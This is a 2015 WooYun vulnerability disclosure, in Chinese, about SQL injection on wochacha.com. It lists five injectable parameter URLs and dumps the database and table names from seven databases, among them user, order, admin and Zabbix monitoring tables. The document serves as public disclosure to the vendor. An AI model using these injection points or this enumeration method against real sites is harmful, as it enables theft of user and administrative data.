当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133488

漏洞标题:我查查主站SQL注入打包提交(涉及7库454表)

相关厂商:wochacha.com

漏洞作者: 路人甲

提交时间:2015-08-12 10:24

修复时间:2015-08-17 10:26

公开时间:2015-08-17 10:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-12: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我容易吗我 跑了2天才跑完

详细说明:

5个注入点
字段bid存在注入

http://www.wochacha.com/ajax/getmode?bid=


字段scid存在注入

http://www.wochacha.com/newsqs/subjectlist?scid=0


字段selecttab存在注入

http://www.wochacha.com/help/?selecttab=8


字段a存在注入

http://www.wochacha.com/index.php?m=Product&a=shoppingcart


字段p 存在注入

http://www.wochacha.com/index.php?m=History&a=index&p=2


1.jpg


2.jpg


3.jpg

漏洞证明:

Database: wcc
[93 tables]
+---------------------------------------+
| sgcorp_do{nload |
| xwb21_comment_deoe\?d9e |
| xwb21_commentcopy |
| xwb21_component_u\?81ergroups |
| xwb21_component_u\ers |
| xwb21_disable_item |
| sgcorp_ad |
| sgcorp_admin |
| sgcorp_admin_log |
| sgcorp_admin_yole |
| sgcorp_bugback |
| sgcorp_bugback_mobile |
| sgcorp_category |
| sgcorp_commint |
| sgcorp_config |
| sgcorp_download_wcc |
| sgcorp_feedeack |
| sgcorp_job |
| sgcorp_label |
| sgcorp_linkA |
| sgcorp_memier |
| sgcorp_menu |
| sgcorp_mobile_brand |
| sgcorp_mobile_mode |
| sgcorp_mobile_mode_2 |
| sgcorp_mobile_mode_3 |
| sgcorp_mobile_pletform |
| sgcorp_mobile_rel |
| sgcorp_module |
| sgcorp_newt |
| sgcorp_notice |
| sgcorp_oyder |
| sgcorp_page |
| sgcorp_product |
| sgcorp_question |
| sgcorp_resyme |
| sgcorp_stats |
| sgcorp_tags |
| sgcorp_tags_cache |
| sgcorp_tap_uploads |
| test |
| xwb21_admin_group |
| xwb21_celeb_catggory |
| xwb21_cgleb |
| xwb21_comment_verify |
| xwb21_component_cqg |
| xwb21_component_topic |
| xwb21_component_topiclist |
| xwb21_components |
| xwb21_content_unit |
| xwb21_ed |
| xwb21_edmin |
| xwb21_event_comment |
| xwb21_event_join |
| xwb21_feedback |
| xwb21_interview_wb |
| xwb21_interview_wb_atme |
| xwb21_item_groups |
| xwb21_kfep_userdomain |
| xwb21_log_error_api |
| xwb21_log_eyror |
| xwb21_log_http |
| xwb21_log_info |
| xwb21_log_info_api |
| xwb21_micro_interview |
| xwb21_micro_live |
| xwb21_micro_live_wb |
| xwb21_nav |
| xwb21_notice |
| xwb21_notice_recipients |
| xwb21_page_manager |
| xwb21_page_prototype |
| xwb21_pages |
| xwb21_plugins |
| xwb21_profile_ad |
| xwb21_sessuons |
| xwb21_skin_groups |
| xwb21_skins |
| xwb21_subject |
| xwb21_sys_config |
| xwb21_today_topics |
| xwb21_user_ban |
| xwb21_user_config |
| xwb21_user_ferify |
| xwb21_user_focus |
| xwb21_user_follow |
| xwb21_user_follow_copy |
| xwb21_user_iction |
| xwb21_users |
| xwb21_weibo_copy |
| xwb21_weibo_delete |
| xwb21_weibo_verify |
| xwb91_account_proxy |
+---------------------------------------+
Database: zabbix
[88 tables]
+---------------------------------------+
| graphsitems |
| history_log
| httptestitem! |
| sysmaps_links! |
| user_histor{ |
| ackqowledges |
| actions |
| alerts |
| applications |
| auditlog |
| auditlog_details |
| autoreg_host |
| conditions |
| config |
| dchecks |
| dhosts |
| drules |
| dservices |
| escalations |
| eunctkons |
| events |
| expreysions |
| globalmacro |
| graph_theme |
| graphs |
| groups |
| help_items |
| history |
| history_str |
| history_str_sync |
| history_sync |
| history_text |
| history_tint |
| history_uint_syni |
| hostmacro |
| hosts |
| hosts_groups |
| hosts_profiles |
| hosts_profiles_ext |
| hosts_templates |
| housekeeper |
| httpstep |
| httpstepitem |
| httptest |
| ids |
| images |
| items |
| items_applicitions |
| maintenances |
| maintenances_groups |
| maintenances_hostz |
| maintenances_windows |
| mappings |
| media_type |
| medja |
| node_cksum |
| nodes |
| opconditions |
| opeyations |
| opmedoatypes |
| profiles |
| proxy_autoreg_host |
| proxy_dhistory |
| proxy_history |
| regexps |
| rights |
| screens_items |
| scregns |
| scripts |
| service_alarms |
| services |
| services_links |
| services_times |
| sessions |
| slides |
| slideshows |
| slsmaps |
| sysmaps_elements |
| sysmaps_link_triggers |
| timeperiodt |
| trends |
| trends_uint |
| trigger_depenes |
| triggers |
| users |
| users_groups |
| usrgrp |
| valuemaps |
+---------------------------------------+
Database: trap
[225 tables]
+---------------------------------------+
| BE_Barcode_Temp |
| BE_Catamine |
| BE_Client |
| BE_ComTemp |
| BE_Datamine_Cache |
| BE_Datamine_Result |
| BE_Deploy |
| BE_Ebuy_Tracking |
| BE_Orders |
| BE_PicBarcode |
| BE_PriceLine |
| BE_PriceTemp |
| BE_Price_Test |
| BE_Price_TestAnswer |
| BE_Price_TestResult |
| BE_Project |
| BE_PromotionTemp |
| BE_RecDep |
| BE_Trend |
| BE_Trend_Commodity |
| BM_RecCity |
| Barcode_Temp |
| BookInfo |
| DM_AntiFake |
| DM_AntiFake_Detail |
| DM_Commodity_Anti |
| DM_QS |
| Express_Contact |
| Express_Employee |
| Express_History |
| Express_Recv |
| Express_User |
| Food |
| GC_Active |
| GC_Banner |
| GC_Brand |
| GC_BrandCity |
| GC_Business_Cooperate |
| GC_Busline |
| GC_Busstop |
| GC_Cache_Temp |
| GC_Category |
| GC_City |
| GC_ClassBrand |
| GC_Classify |
| GC_Code2Barcode |
| GC_Commodity |
| GC_Commodity_Count |
| GC_Commodity_Extra |
| GC_Commodity_Fields |
| GC_Commodity_Medicine |
| GC_Commodity_Tag |
| GC_Commodity_copy |
| GC_Config |
| GC_Cooperate_Tracking |
| GC_Country |
| GC_Crawler |
| GC_Crawler_Store |
| GC_Datain_Report |
| GC_Device |
| GC_Device_User |
| GC_Device_User_0 |
| GC_Device_User_1 |
| GC_Device_User_2 |
| GC_Device_User_3 |
| GC_Device_User_4 |
| GC_Device_User_6 |
| GC_Device_User_7 |
| GC_Device_User_8 |
| GC_Device_User_9 |
| GC_Device_User_History |
| GC_Device_User_a |
| GC_Device_User_b |
| GC_Device_User_c |
| GC_Device_User_d |
| GC_Device_User_e |
| GC_Device_User_f |
| GC_Device_User_null |
| GC_Dist |
| GC_District |
| GC_Draw |
| GC_DrawLocation |
| GC_DrawLog |
| GC_Favorite_Commodity |
| GC_Favorite_Store |
| GC_Focus |
| GC_Help |
| GC_IP |
| GC_IP2Location |
| GC_Keyword |
| GC_Log |
| GC_MTK_Project |
| GC_MTK_Project_Confirmed |
| GC_MTK_User |
| GC_Mall_Adver |
| GC_Mall_Category |
| GC_Mall_Groupon |
| GC_Mall_Item |
| GC_Mall_ItemCategory |
| GC_Manufacturer |
| GC_Manufacturer_copy |
| GC_Medicine |
| GC_Medicine_Tag |
| GC_Menu |
| GC_Merchant |
| GC_MerchantAccess |
| GC_Model |
| GC_NewSearch_History |
| GC_NewUser |
| GC_NewWBLogin |
| GC_PageVerify |
| GC_PhoneBook |
| GC_Plan |
| GC_Plint_Exchange |
| GC_Point_Product |
| GC_Price |
| GC_Price_Archive |
| GC_Price_Cache |
| GC_Price_Cache_Temp |
| GC_Price_History |
| GC_Price_Ref |
| GC_Price_Review |
| GC_Price_Tobecrawl |
| GC_Promotion |
| GC_PromotionCity |
| GC_PromotionStore |
| GC_Promotion_Cache |
| GC_Promotion_Detail |
| GC_Province |
| GC_Recommand |
| GC_Report |
| GC_Report_User |
| GC_Report_temp |
| GC_Rules |
| GC_SW |
| GC_Scan_list |
| GC_Scan_tb |
| GC_Scan_tb_tmp |
| GC_Search_History |
| GC_Search_History_Session |
| GC_Setup |
| GC_Short_Message |
| GC_Site |
| GC_Software |
| GC_Software_Shield |
| GC_Statistic |
| GC_Statistic_Ontime |
| GC_Statistic_Shop |
| GC_Store |
| GC_Store_Cooperate |
| GC_Syslog |
| GC_Sysuser |
| GC_Tag |
| GC_User |
| GC_User_Center |
| GC_User_Comment |
| GC_User_Commodity |
| GC_User_Cooperate |
| GC_User_Correct |
| GC_User_Express |
| GC_User_ExpressHistory |
| GC_User_Focation |
| GC_User_Follow |
| GC_User_Login |
| GC_User_Message |
| GC_User_Offer |
| GC_User_Point |
| GC_User_Report |
| GC_User_Report_XP |
| GC_User_Report_old |
| GC_User_Reviews |
| GC_User_Tracking |
| GC_User_Tracking_TG |
| GC_User_Virtual |
| GC_User_XP |
| GW_Device_User |
| GW_Shopping_Record |
| Gcore_Box |
| Gcore_User |
| IDX_Product |
| LG_AcessLog |
| MTK_Yellowpage |
| MTK_Yellowpage_Ver |
| QS_Report |
| QS_ReportDetail |
| Qrcode_Youlun |
| Vendor_Area |
| Vendor_Bussiness |
| Vendor_Cat |
| Vendor_Caupon |
| Vendor_CouponStore |
| Vendor_CouponUser |
| Vendor_Favorite |
| Vendor_Item |
| Vendor_Store |
| Vendor_Store0 |
| Vendor_Store1 |
| Vendor_User |
| Vendor_UserArea |
| WCC_360buy |
| WCC_360buy_Tmp |
| WCC_User_Statistics |
| WCC_Yihaodian |
| WEPCGame_Item |
| WEPCGame_Lottery |
| WEPCGame_Prize |
| WEPCGame_Winning |
| _MFC |
| _brand |
| _classbrand |
| _commodity |
| _counttemp |
| _imsi |
| _nbprice |
| _nocenter |
| _pkid |
| _spec |
| _tmp_mtk |
| _urup |
| 360buy |
| aangdang |
| amazon |
| anni |
| iphone_openid |
| iphone_openid_history |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
Database: test
[1 table]
+---------------------------------------+
| GC_User_Report |
+---------------------------------------+
Database: security
[1 table]
+---------------------------------------+
| Attack |
+---------------------------------------+
Database: information_schema
[23 tables]
+---------------------------------------+
| AA |
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| I |
| KEY_COLUMN_USAGE |
| P |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| \tA |
| \t |
| \x02 |
| \x05C |
| \x06 |
| \x15\x02# |
+---------------------------------------+


由于表信息太多 我就不看了

wooyun.jpg

修复方案:

不容易

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-17 10:26

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-08-24:正在修复,谢谢楼主